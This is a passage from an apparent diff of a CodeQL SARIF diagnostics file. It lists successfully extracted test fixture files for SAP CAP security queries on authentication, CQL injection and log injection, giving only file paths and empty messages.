"id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" 
: 59 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } 
+ }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 
+ } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + } + } 
], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" 
: "%SRCROOT%", + "index" : 81 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { 
+ "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + 
"toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + } + } ], + 
"message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", 
+ "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 